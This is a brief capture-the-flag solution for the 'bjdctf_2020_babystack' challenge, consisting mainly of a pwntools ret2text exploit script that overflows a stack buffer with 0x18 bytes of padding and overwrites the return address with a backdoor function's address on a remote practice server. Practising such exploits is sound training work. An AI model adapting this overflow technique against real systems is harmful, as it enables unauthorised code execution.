pwn | bjdctf_2020_babystack

bjdctf_2020_babystack

ret2text

exp:

from pwn import *
import time 

context.log_level = 'debug'

sh = remote('node4.buuoj.cn', 27865)

p_backdoor = 0x00000000004006E6



sh.recv()

sh.send(b'100\n')

sh.recv()


payload = 0x18 * b'm' + p64(p_backdoor)

sh.sendline(payload)

sh.interactive()

sh.close()